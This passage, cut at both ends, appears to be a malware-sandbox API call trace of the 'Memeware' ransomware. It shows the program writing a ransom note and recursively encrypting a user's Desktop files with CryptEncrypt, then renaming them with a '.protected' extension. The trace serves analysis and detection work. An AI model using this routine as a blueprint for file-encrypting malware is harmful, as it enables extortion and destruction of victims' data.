nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0091.154] lstrlenA (lpString="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") returned 684 [0091.154] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0091.154] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.154] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0091.155] CloseHandle (hObject=0xa4) returned 1 [0091.155] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0091.155] lstrcmpiW (lpString1="Cookies", lpString2="Windows") returned -1 [0091.155] lstrcmpiW (lpString1="Cookies", lpString2="Program Files") returned -1 [0091.155] lstrcmpiW (lpString1="Cookies", lpString2="Program Files (x86)") returned -1 [0091.155] lstrcmpiW (lpString1="Cookies", lpString2="$Recycle.bin") returned 1 [0091.155] lstrcmpiW (lpString1="Cookies", lpString2="System Volume Information") returned -1 [0091.155] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies") returned 41 [0091.155] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0091.155] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0091.155] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*") returned 43 [0091.155] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0091.155] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0091.155] lstrcmpiW (lpString1="Desktop", lpString2="Windows") returned -1 [0091.155] lstrcmpiW (lpString1="Desktop", lpString2="Program Files") returned -1 [0091.155] lstrcmpiW (lpString1="Desktop", lpString2="Program 
Files (x86)") returned -1 [0091.155] lstrcmpiW (lpString1="Desktop", lpString2="$Recycle.bin") returned 1 [0091.155] lstrcmpiW (lpString1="Desktop", lpString2="System Volume Information") returned -1 [0091.155] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 41 [0091.155] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0091.155] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0091.155] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*") returned 43 [0091.155] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0091.155] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.155] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.156] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.156] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.156] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.156] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 43 [0091.156] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.156] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0091.156] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0091.156] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.156] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.156] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.156] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.156] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.156] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.156] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.156] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.156] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\..") returned 44 [0091.156] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.156] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.156] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0091.156] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0091.156] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.156] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.156] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.156] lstrcmpiW (lpString1="4CnSrLzCWij.bmp", lpString2="Windows") returned -1 [0091.156] lstrcmpiW (lpString1="4CnSrLzCWij.bmp", lpString2="Program Files") returned -1 [0091.156] lstrcmpiW (lpString1="4CnSrLzCWij.bmp", lpString2="Program Files (x86)") returned -1 [0091.156] lstrcmpiW (lpString1="4CnSrLzCWij.bmp", lpString2="$Recycle.bin") returned 1 [0091.156] lstrcmpiW (lpString1="4CnSrLzCWij.bmp", lpString2="System Volume Information") returned -1 [0091.156] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4CnSrLzCWij.bmp") returned 57 [0091.156] StrStrIW (lpFirst="4CnSrLzCWij.bmp", lpSrch=".protected") returned 0x0 [0091.156] lstrcmpW (lpString1="4CnSrLzCWij.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0091.156] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.156] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4CnSrLzCWij.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4cnsrlzcwij.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.157] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4CnSrLzCWij.bmp") returned 57 [0091.157] StrStrW (lpFirst="4CnSrLzCWij.bmp", lpSrch=".txt") returned 0x0 [0091.157] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4CnSrLzCWij.bmp") returned 57 [0091.157] StrStrW (lpFirst="4CnSrLzCWij.bmp", lpSrch=".rar") returned 0x0 [0091.157] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4CnSrLzCWij.bmp") returned 57 [0091.157] StrStrW (lpFirst="4CnSrLzCWij.bmp", lpSrch=".zip") returned 0x0 [0091.157] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.158] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.158] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.158] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.158] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.158] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.158] CloseHandle (hObject=0xb4) returned 1 [0091.159] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4CnSrLzCWij.bmp.protected") returned 67 [0091.159] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4CnSrLzCWij.bmp" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\desktop\\4cnsrlzcwij.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4CnSrLzCWij.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4cnsrlzcwij.bmp.protected")) returned 1 [0091.159] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.159] lstrcmpiW (lpString1="7gYc1.rtf", lpString2="Windows") returned -1 [0091.159] lstrcmpiW (lpString1="7gYc1.rtf", lpString2="Program Files") returned -1 [0091.159] lstrcmpiW (lpString1="7gYc1.rtf", lpString2="Program Files (x86)") returned -1 [0091.160] lstrcmpiW (lpString1="7gYc1.rtf", lpString2="$Recycle.bin") returned 1 [0091.160] lstrcmpiW (lpString1="7gYc1.rtf", lpString2="System Volume Information") returned -1 [0091.160] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7gYc1.rtf") returned 51 [0091.160] StrStrIW (lpFirst="7gYc1.rtf", lpSrch=".protected") returned 0x0 [0091.160] lstrcmpW (lpString1="7gYc1.rtf", lpString2="RESTORE_FILES.txt") returned -1 [0091.160] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.160] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7gYc1.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7gyc1.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.160] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7gYc1.rtf") returned 51 [0091.160] StrStrW (lpFirst="7gYc1.rtf", lpSrch=".txt") returned 0x0 [0091.160] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Desktop\\7gYc1.rtf") returned 51 [0091.160] StrStrW (lpFirst="7gYc1.rtf", lpSrch=".rar") returned 0x0 [0091.160] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7gYc1.rtf") returned 51 [0091.160] StrStrW (lpFirst="7gYc1.rtf", lpSrch=".zip") returned 0x0 [0091.160] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.161] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.161] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.161] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.161] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.161] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.161] CloseHandle (hObject=0xb4) returned 1 [0091.162] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7gYc1.rtf.protected") returned 61 [0091.162] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7gYc1.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7gyc1.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Desktop\\7gYc1.rtf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7gyc1.rtf.protected")) returned 1 [0091.162] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.162] lstrcmpiW (lpString1="7YQ_vFv", lpString2="Windows") returned -1 [0091.162] lstrcmpiW (lpString1="7YQ_vFv", lpString2="Program Files") returned -1 [0091.162] lstrcmpiW (lpString1="7YQ_vFv", lpString2="Program Files (x86)") returned -1 [0091.162] lstrcmpiW (lpString1="7YQ_vFv", lpString2="$Recycle.bin") returned 1 [0091.162] lstrcmpiW (lpString1="7YQ_vFv", lpString2="System Volume Information") returned -1 [0091.163] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv") returned 49 [0091.163] lstrcmpW (lpString1="7YQ_vFv", lpString2=".") returned 1 [0091.163] lstrcmpW (lpString1="7YQ_vFv", lpString2="..") returned 1 [0091.163] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\*") returned 51 [0091.163] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0091.163] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.163] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.163] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.163] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.163] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.163] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\.") returned 51 [0091.163] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.163] FindNextFileW (in: hFindFile=0x47b9d0, 
lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.163] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.163] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.163] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.163] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.163] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.163] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\..") returned 52 [0091.163] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.163] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.163] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.163] lstrcmpiW (lpString1="I-nVNcxpkWGgDJb.ods", lpString2="Windows") returned -1 [0091.163] lstrcmpiW (lpString1="I-nVNcxpkWGgDJb.ods", lpString2="Program Files") returned -1 [0091.163] lstrcmpiW (lpString1="I-nVNcxpkWGgDJb.ods", lpString2="Program Files (x86)") returned -1 [0091.163] lstrcmpiW (lpString1="I-nVNcxpkWGgDJb.ods", lpString2="$Recycle.bin") returned 1 [0091.163] lstrcmpiW (lpString1="I-nVNcxpkWGgDJb.ods", lpString2="System Volume Information") returned -1 [0091.163] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\I-nVNcxpkWGgDJb.ods") returned 69 [0091.163] StrStrIW (lpFirst="I-nVNcxpkWGgDJb.ods", lpSrch=".protected") returned 0x0 [0091.163] lstrcmpW (lpString1="I-nVNcxpkWGgDJb.ods", lpString2="RESTORE_FILES.txt") returned -1 [0091.163] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.163] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: 
pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.163] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\I-nVNcxpkWGgDJb.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\i-nvncxpkwggdjb.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.164] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\I-nVNcxpkWGgDJb.ods") returned 69 [0091.164] StrStrW (lpFirst="I-nVNcxpkWGgDJb.ods", lpSrch=".txt") returned 0x0 [0091.164] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\I-nVNcxpkWGgDJb.ods") returned 69 [0091.164] StrStrW (lpFirst="I-nVNcxpkWGgDJb.ods", lpSrch=".rar") returned 0x0 [0091.164] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\I-nVNcxpkWGgDJb.ods") returned 69 [0091.164] StrStrW (lpFirst="I-nVNcxpkWGgDJb.ods", lpSrch=".zip") returned 0x0 [0091.164] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.165] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.165] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.165] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.165] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, 
lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.165] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.165] CloseHandle (hObject=0xd4) returned 1 [0091.166] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\I-nVNcxpkWGgDJb.ods.protected") returned 79 [0091.166] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\I-nVNcxpkWGgDJb.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\i-nvncxpkwggdjb.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\I-nVNcxpkWGgDJb.ods.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\i-nvncxpkwggdjb.ods.protected")) returned 1 [0091.166] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.166] lstrcmpiW (lpString1="mxcky74GMvvBNcJLcV.pps", lpString2="Windows") returned -1 [0091.166] lstrcmpiW (lpString1="mxcky74GMvvBNcJLcV.pps", lpString2="Program Files") returned -1 [0091.167] lstrcmpiW (lpString1="mxcky74GMvvBNcJLcV.pps", lpString2="Program Files (x86)") returned -1 [0091.167] lstrcmpiW (lpString1="mxcky74GMvvBNcJLcV.pps", lpString2="$Recycle.bin") returned 1 [0091.167] lstrcmpiW (lpString1="mxcky74GMvvBNcJLcV.pps", lpString2="System Volume Information") returned -1 [0091.167] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\mxcky74GMvvBNcJLcV.pps") returned 72 [0091.167] StrStrIW (lpFirst="mxcky74GMvvBNcJLcV.pps", lpSrch=".protected") returned 0x0 [0091.167] lstrcmpW (lpString1="mxcky74GMvvBNcJLcV.pps", lpString2="RESTORE_FILES.txt") returned -1 [0091.167] CryptGenRandom (in: 
hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.167] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\mxcky74GMvvBNcJLcV.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\mxcky74gmvvbncjlcv.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.167] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\mxcky74GMvvBNcJLcV.pps") returned 72 [0091.167] StrStrW (lpFirst="mxcky74GMvvBNcJLcV.pps", lpSrch=".txt") returned 0x0 [0091.167] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\mxcky74GMvvBNcJLcV.pps") returned 72 [0091.167] StrStrW (lpFirst="mxcky74GMvvBNcJLcV.pps", lpSrch=".rar") returned 0x0 [0091.167] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\mxcky74GMvvBNcJLcV.pps") returned 72 [0091.167] StrStrW (lpFirst="mxcky74GMvvBNcJLcV.pps", lpSrch=".zip") returned 0x0 [0091.167] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.168] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.168] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.169] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
